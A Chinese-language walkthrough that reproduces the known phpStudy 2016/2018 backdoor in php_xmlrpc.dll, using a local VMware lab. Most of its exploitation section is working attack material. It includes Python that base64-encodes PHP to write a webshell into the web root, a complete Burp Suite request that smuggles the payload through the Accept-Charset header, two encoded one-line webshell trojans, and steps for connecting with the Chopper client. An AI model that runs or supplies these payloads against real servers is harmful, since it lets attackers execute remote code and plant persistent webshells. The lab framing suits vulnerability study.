漏洞简介

关于phpStudy的后门漏洞可参考

phpStudy在下列文件中存在后门

phpStudy2016php\php-5.2.17\ext\php_xmlrpc.dllphp\php-5.4.45\ext\php_xmlrpc.dllphpStudy2018PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dllPHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

测试环境的搭建

环境

• vmware workstation14
• win7网站(ip 192.168.43.196)
• win10攻击者(ip 192.168.43.253)
• burpsuite
• phpstudy2018

安装phpstudy2018

phpstudy2018 安装包下载地址

安装成功

安装成功后访问http://192.168.43.196

image.png

使用notepad++打开 C:\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll,检索eval,如下图所示,说明存在后门

php_xmlrpc.dll中含有后门.png

后门的利用

通过burpsuite抓包,客户端可以通过HTTP头部的Accept-Charset字段来向后台提交命令

执行命令

写入shellcode

In [15]: def b64encode(a):    ...:             print(base64.b64encode(a.encode('utf-8')))In [30]: b64encode(r"""$f =fopen("C:\phpStudy\PHPTutorial\WWW\x.php","w");fwrite($f,"
    "); fclose($f);""")b'JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs='

使用burpsuiter repeater模块写入webshell,HTTP头部如下

GET / HTTP/1.1Host: 192.168.43.196User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Charset: JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=Accept-Encoding: gzip,deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 2

两个一句话木马

atob('c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=')"system('echo ^
    >PHPTutorial\\WWW\\shell.php');"atob('JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=')"$f =fopen(\"C:\\phpStudy\\PHPTutorial\\WWW\\x.php\",\"w\");fwrite($f,\"
    \");fclose($f);"

使用菜刀连接

使用菜刀连接

打开shell

参考资料

• Phpstudy漏洞复现利用
• poc